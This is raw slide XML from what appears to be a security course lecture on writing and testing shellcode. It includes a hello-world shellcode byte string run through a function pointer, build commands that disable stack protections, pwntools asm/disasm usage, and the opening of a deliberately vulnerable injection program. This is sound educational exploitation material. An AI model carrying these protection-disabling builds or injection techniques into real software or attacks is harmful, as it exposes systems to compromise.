              <a:t>Hello,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World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7422" y="1855898"/>
            <a:ext cx="7545705" cy="4027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solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/* gcc -z execstack -o hw hw.c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-60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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>*/</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="just">
              <a:lnSpc>
                <a:spcPts val="2625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char shellcode[] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="220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22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9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xDB\xF7\xE3\xB0\x0A\x50"</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2926715" marR="8255" algn="just">
              <a:lnSpc>
                <a:spcPts val="2620"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x68\x6F\x72\x6C\x64\x68\x6F"  "\x2C\x20\x57\x68\x48\x65\x6C"  "\x6C\xB0\x04\xB3\x01\x89\xE1"  "\xB2\x0D\xCD\x80\xB0\x01\x31"  "\xDB\xCD\x80"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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55"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()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625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="22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319405" marR="2926080">
              <a:lnSpc>
                <a:spcPts val="262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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*(void (*)())</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode)();  return</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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sz="22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ts val="2545"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="220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15A87EE-6761-4C40-9DBD-E4795CA92AC6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1001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4572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Origins of </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Name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9068" y="1657981"/>
            <a:ext cx="64719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indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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Why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3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shellcode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”?</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365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historically started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000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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command</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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shell</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri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B38E5B2-9E38-4AA1-83AE-2801A48DF8AA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818313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39757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Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521622" y="2199657"/>
            <a:ext cx="5117177" cy="518488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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623" y="2669910"/>
            <a:ext cx="5117176" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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1944" y="2669910"/>
            <a:ext cx="670560" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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623" y="3031859"/>
            <a:ext cx="5117176" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2346325" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2346116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2346116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623" y="3393808"/>
            <a:ext cx="5117178" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="502919" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="502737" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502737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3593" y="2216828"/>
            <a:ext cx="4498975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00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gcc -z execstack -o hw</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hw.c</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2471420">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$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./hw  Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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World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ts val="2760"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$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82B2CDEC-8DC6-4CF8-9761-0538F635AB8E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263471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5542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Shellcoding Tools We</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;3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9068" y="1739261"/>
            <a:ext cx="7790815" cy="368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indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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Writing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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365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pwntools (python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package)</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1344930" lvl="2" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1344930" algn="l"/>
                <a:tab pos="1345565" algn="l"/>
              </a:tabLst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asm</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1344930" lvl="2" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1344930" algn="l"/>
                <a:tab pos="1345565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disasm</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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https://defuse.ca/online-x86-assembler.htm</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill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</a:pPr>
            <a:endParaRPr sz="3100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="430530" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365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shtest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A00DEADF-1577-4B6D-9043-3EB8E3BDB58B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614113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2997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asm /</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-105" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>disasm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521623" y="1946011"/>
            <a:ext cx="7541259" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7541259" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7541108" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7541108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623" y="2584892"/>
            <a:ext cx="3499860" cy="1584317"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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7197" y="1896982"/>
            <a:ext cx="7380605" cy="220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Basic Usage, you should read the help’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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(-h)</a:t>
            </a:r>
            <a:endParaRPr sz="2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450" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="179705">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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asm</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="515620" marR="4851400" indent="-1270">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pP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xor eax,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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eax  </a:t>
            </a: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(ctrl+d) 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31c0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1623" y="4479656"/>
            <a:ext cx="670560" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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1944" y="4479656"/>
            <a:ext cx="1005840" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1005839" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1005485" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005485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97425" y="4479656"/>
            <a:ext cx="167640" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="167639" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167582" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167582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5004" y="4479656"/>
            <a:ext cx="670560" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="670560" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="670320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670320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1623" y="4841605"/>
            <a:ext cx="5802977" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5865495" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5865302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5865302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1283" y="4446000"/>
            <a:ext cx="220345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47345" marR="5080" indent="-335280">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="219"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1183005" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$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disasm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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31c0  0:	31</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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c0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81362" y="4781979"/>
            <a:ext cx="527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xor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82171" y="4791489"/>
            <a:ext cx="1196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eax,eax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01BFDA30-5621-4A23-B078-CF87758B5F8A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320992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79E761C-A0F3-4792-828E-60599B3A95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6676" y="488791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Shellcoding</a:t>
            </a:r>
            <a:endParaRPr sz="4800" dirty="0"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4BBCE1C3-FE67-4D3E-AEF2-A8C2FC527FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322567" y="5029740"/>
            <a:ext cx="3886200" cy="304267"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27905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9539" y="1739261"/>
            <a:ext cx="4994275" cy="42355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 indent="-518159">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Basic </a:t>
            </a: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Stack Smashing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-8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Review</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pP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Defining</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-1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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-2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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Linux System</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-15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Calls</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Writing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a: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Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-65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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Shellcode in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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Additional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Notes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E5933FFE-5E2F-4FF4-BFF4-D49BF97C90C0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535153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5598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Shellcode in</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Exploitation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17812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33705" marR="5080" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="433705" algn="l"/>
                <a:tab pos="434340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>real </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>world, </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>99% of </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8063A1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>won’t </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‘win’ function laying </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>around </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>for you to return </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>once you hijack </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>control </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>flow... so </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>what </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>do you do  instead?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3175"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alibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="3100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="433705" marR="170815" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="433705" algn="l"/>
                <a:tab pos="434340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>You inject </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>part of your payload </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>return to</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>that!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5824E609-F461-4B3E-B904-7FE967539E8C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770323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565358"/>
            <a:ext cx="518414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inject.c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30223" y="1949322"/>
            <a:ext cx="8228965" cy="374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FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="197400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/* gcc -z execstack -fno-stack-protector -o inject inject.c */  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int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spc="-5" dirty="0">
